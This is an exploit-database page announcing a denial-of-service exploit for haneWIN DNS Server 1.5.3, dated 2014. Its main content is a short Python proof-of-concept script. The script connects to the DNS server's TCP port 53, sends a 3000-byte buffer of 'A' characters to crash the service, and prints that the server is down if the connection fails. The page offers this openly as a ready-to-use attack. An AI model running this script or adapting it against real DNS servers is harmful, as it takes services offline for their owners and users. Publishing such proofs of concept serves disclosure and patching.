haneWIN DNS Server 1.5.3 Denial of service

2014.01.18
Credit: sajith
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################################################### [~] Exploit Title: haneWIN DNS Server 1.5.3 - Denial of service [~] Author: sajith [~] version: haneWIN DNS Server 1.5.3 [~]Vendor Homepage: http://www.hanewin.net/ [~] vulnerable app link:http://www.hanewin.net/dns-e.htm [~]Tested in windows Xp sp3 ########################################################### #POC by sajith shetty import socket target = "127.0.0.1" port = 53 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target, port)) buf = "A" * 3000 request = buf s.send(request) data = s.recv(1024) print data except: print "DNS server is Down!"

References:

http://www.hanewin.net/dns-e.htm


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top